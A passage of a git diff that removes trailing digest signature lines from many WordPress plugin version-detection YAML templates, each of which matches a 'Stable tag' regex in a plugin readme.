'(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205fbcf98560d324060ccb8bd6a6a5c9bf8a034ab9e1517278df57bf598c08d1bb022100892b8666d0a26cf9a61b38fbe1efb524c3df51078e41b9d4d671b0db9a10b031:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 5aecb2bd46..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205f55f5262c3f309e53b3f36cd3a85447516f6e9e56093462794dfb77ca782d3d022020e1070b8aa445d48acda714f5d4e7b594146b2ae76d7a0b804c5ab0b82cf86a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index f9a3602e78..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b4341e1009d6a9d9b9eed702abee0b909824b732dccf6856d441983d28ff7b26022100f52f15636957221eade5ca919f5d03672b3546a73dafc782ff0e16680dc6803d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 02454c2b14..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f45ed1d92acb13167da4a1d5683306639bfede76f33a5a6e5aa74c73c40d58460221008d41a53d410bf20d1774e954b29facb5e119d59fe099471c07d8d6e42e82db62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 7a43a1648b..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022048ef5d1540b2ffee8e5b650cca5a7e740888eeed1e25296380b2a17052d97f9b022100bbee40fdc61a8d2ddffc3a5df51a029e0902cdb16652fbf0963e2f60c4211169:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 2a574e6646..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220657cf10f90daf78233151c415228a668a2b0dae0c637d019ce2c88ff7e7221ef02202a09f2ce4695a2d18dd8d2b95315dd4fb6776ff53765120b4ecc9ec6cbf3ce41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 3241cfadfa..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022073146792c9313797508b74baf87230fee7cac57e7c0d600ff56852a682727317022100dc735b00a72e86a132f36ab446ecd78f89c178cdf7c955b74c31d27e5231ace2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index a01c624347..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204de2c42b39ac43725151ad901f1f1b2a704d85b531d4f5ae91dc17c2abd043df022077f2a4938af3f86f39b03b22a7a73d786cb9d8b3453308e0bf5b84fa18dd2e6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index c407df0050..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e43bd782a0019bfa3fef6af2276155fca7b242f8a45b34de036c2fccd69cccd102206960bd330c84add83104caf2db5845e8611e1c2bbbf7292dd9320f1d0b9e3e02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 463480b8f4..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008ca13ae1b925366b89a0df7149a31643b3a97a525ec39f2e19307562c62c153502200d52b375c29ca2f79f1c6febdf6a3ba7bd8cb9a10db8f0f9b3bff8d49dbfac02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index fde974742c..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220360e72e0c26c2f6a663b72a57c2d3826ba4fa9f15215dec0c99a13f1a4b7d6ad0220230612c93a79b6844b81ec52ab7eb78aeffc753977e6b186d47448445aa7fe68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 24caf5c9aa..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a0b9023fe3248e33a25ecf7048cae556cd84cc89a8a321f3efc945437e9371fc022100e46dee0a454456df343dee54a886744b5c99b38e67aac32687d1e3f969381a9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 860ac14aa2..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d20c755f3a0fc3487994512082d7db209b9d3853202af4d52fa666648be18348022100bab882c8d319a605959c8e90030b5bcf2b368e0672e0bd6a950ee6736c55c157:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 87dc2528a6..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022028380effe3742a8f29031cbb20e60f0367e454ee03831e5427f556412291988602204d02a8327d0aec9838fa7bce1e7077d4c46d4df5bb6e1c22a549caae2aeece4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index a431a46e0d..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202d29daabb6a7d4ee004ac0d4ef5a597ba7cb64c26cd66cc707daf851736d45c502210099644ad44088178fc850963a344e01d7b9eca0ecfe7a3e32b86c1a32032d74b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 4f7e445d86..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022024e302f8956a0918d301d86eadbd5ced02b7ca756f56c16d5e1b860545aa14ee02206529da1bb9cb5fa767b8cb4b16e69556091e5e89616e462faab104fee5fb9ab7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index e8981ffbdf..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c81c532a17a031019056b53f4f6ae9707d0292f7b053a4a790739309fcf07877022100b488dc13052fb46edc50b4bfe867233010a7f8637d35cdc6f56011ac028c15d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 4bb5cd9854..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b38a0cd5e483c0dc9f77953e26e8f7377d2752ab0469e9499ed36e3f0726a0e202200bb47696c982c314731e411ceca4f764bc9dde1545160ef275278f37242ce226:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 54698abd8d..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fd9951c04796b7086708c3fb09fedd3355a1eca1e12847f71ca847a122c6a1f10220630495641b0f8a5b7261a36eeb477ea3e6289b609a640b9ad4c25ca495a8a73a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 736cc64363..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220357d06ef9dfc077a939d47219a8651ecdfeb3191892461cc91c9dee5638fe0cc02210098d74263a2bd6c7c1f8c92ccccf79e2e1d89064b153ad72a61663860c9c52ea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index a782407353..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022027c35c173b66e1858069c7b0477f20f440245411402cdc865bf2902ac5814466022100cea5322eb35a164a49f7096acde323cb73bee143afa39d7474378bd6eff20ad7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 74c272c9ca..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009f06fe2c5b04cee45989ba95c6e1cd0a6b93b845fc6a3a0da69945fdda68e56d02204973c0279612c575b51e47c62181354ed4e8a83d69c144ebf78b1eb61cc68381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index faba721301..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200fa0820ed7254515bd27d05593817072158a36399e1c40b049d2b16eb30b40e6022100978b3a45e6683b2dfd7d96b6922675f19f8894c3929c8f42164758a28962a08b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 77c3a39a51..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204a4962e5223a8af803879918ac5cb2931247d3fbcf99b158f52fad3e4e8ebb4f02210095f1fcfafc7df22206ef8ac864b77ea31e2c928f959f8c6d056f7f5f0c5cdf2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index fdac9815e1..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022018124e7961eff98b0f18e358b178accaa75a924e2b16704cb0f028e4b384471c022100a8ea275117d9c0bc54449579ae7dcfd317f1ab537cfe76ad5d338a741dffee04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index cd091d879e..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210090912c48245c8a21f423367c9f6a2ac037fef9fd30454bf9ccfe67cb9973b1d0022100ceb2c4b0bc69ea41a93856f58e590e071fd21eae6b7a5d6c792445344e902592:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 77f238212b..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100970a35952f0858b966a5a1875ca748a97dafaa513a0a4dc1068e9dd9107c6dfd02202d4bd2e90a235ef8c7aff23ec888c819e4d1d3ade0a0f43912cc07d83542560c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 5eee026146..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d709883e1ac1d0c5a488938e9515432bfd8a5e5f6f66df9f51ec73c5edc6f860022100a1a256bb32363f93cfab2094e324ed959f7f05369f83419906200477c569b466:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 3abef53e0f..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022056cd0ebd74f21ffad60a04c7cbc4f12f0ae3b45aae1c13166584297b4eb854d9022100b30cd9e0027af039eb5deecbc3fffb96053e62c0819ccb34441cd55a51077b2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 7f7e270b6b..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fdbe95249ffdba58c751370d28daa20982670b141a9bd6cb4f13719e2659e62d022100d81159192da5dcab10b8e7af15d4fd4ebc0efb7a583c68ab440282b164b12d4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 59c2e19a33..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203881cb61210cb7e7faf3f5c272919f2d64b263ee22cff444d48b95497052f406022100b1efd6da45f59919fb1eec000ff7c017695be5e71a3377a83e7893d53c2521ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index dab1cf15b5..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cfce7b6e508fca730865975eee474b03611e48f47145e3a668b0d0cd0d3bc336022100d49f23b9c8e551386021e98c753fe7c5ba82efd784a2109f1596e969826c2fb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 6f57e6426a..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022075fca46e4060d4ad75acba4c78e5a6465005a0fed5ab4d7b0933fecb6a26571e022100b14a051fdd3c1432fedd9a902e892ee4b52e42d9b1b1a8ec5d11aa552a387d2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 46c3e5959e..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ee9853dcb5b99d7b7bc794583cdd032645d6f9c2c45b9125529bae65b3121aaf022100c3e5ebff5e915697c899fe4efc7bd6a4b3924b5711aeebe39676e958f299a6e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 19fcf7a180..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022073f2c4e4508ff9ee349c8ab4f214adc4b51f1e94650c683f19dbaaf6c43173bc022100a607a1734e17dc15af2790214d8955e93e3e008381fce7ca7447ba820e6e5f7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 78f4780c6c..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202d328825b1e21531fc9db8493cfbb9038cd1f46823fdcfc13af221da7213930002207d2f2e4eb905377251396074c4c67570356f1bd96c0b450122a94fecfc2d947b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index b10b546d28..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c0c6b594e4bb725476272e67ed054f73bb1d4d7b4a63017b7c964a46dddc0edb02204719ed4cf84b390d1c42c4a16e177b4414b8b332f3ad1337e3d9146397f8a755:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index ad8fb1a50f..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200c2862688856981fa08f8c41c7265baeeb4e253de2b516879c83f0bebf6a07810220578020bd91d1513a5d8cfc85bd4984478705efe59f97b74b414bdb47e7dd9075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index ccc704a3b6..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022038fbb94caeb32da17479af25de7be0680876f6e413b75087262a13179d8f81a502206b998a9a7717e0a436d853244172e4ec1d4b1518546f275cb9d624772704fb8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 4822ad6e3f..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206971970b6d1842a0f7029e131b3e21df255ec2ca0eac471bbf941f4337fd1618022100d648ce8a20d423289da3e37410f7ba6abfef014e7df41559e40bb9bd76d34477:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index eb0260cc0f..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b33d2273e60796a85266574f2f4345635f51d623125b25c46d1debee9badd299022100a95a673c957b79c01c73316963f19ff65cb3b725782b5f8f86a8c4966dd88ca9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 4709617427..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022020347417c55e6e336e9adc0b2203d3d676f121aeee716bd7644ad050b8d1c65402204ebf5edc639ee0f589bf10e53c34da93d5743bb8e5c17fe5f077482e389a9390:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3b9d4b8fc7..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022020738c96ddb89dccb6b58f4a81ae243a7dce5c2208ac580452575c111945bb1102206c19c2a416d404e72a4229da0f0a57a6da77bc425035468223a09beb8314f6d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index cbd4fe14d7..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fd0203e37df7d659ece1560eefece22e09187abace8270e03352dce2ac733c710221008e38e6321395d8d9ee4e2e7e1869bd8247f7d1e94fc442fd0c6055a42f5d7241:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index bbed46d170..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fc8bbcb8eb88ebd4af3165393b0a306f0dcb390693d372b79b674dc5d58a92c3022076a57d6513dc1cdf3ae8a71dcaebfba1753f45cb4514e3658413c067a86d377a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 453b40cece..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ce814f581ecd8cfe97bc9cd869217d6b8c7aa12c297fb06e379cc94913462a3402204014eb3dfd5c16dfe481a3929567bd0ff2f817e50e71ca1e6f90b62c06696ff7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 1ee51ae0bc..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100805559d8d224dde38108de924b23585c7808466817c0afda60313b6cd43d4c4702205478413e43da1a9a02e33d713e89bf30aa758a32508c00d00c8d50d33e770b38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 9d4bb4b8e5..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210097fcc9508745212574650c37d666716ee23af052d2fd9656b50910e3a3cf33ee022100b9001253930fe85d034d6c328d71e5cd1f5d6bfe01df00ca54735ae1bc667d94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml 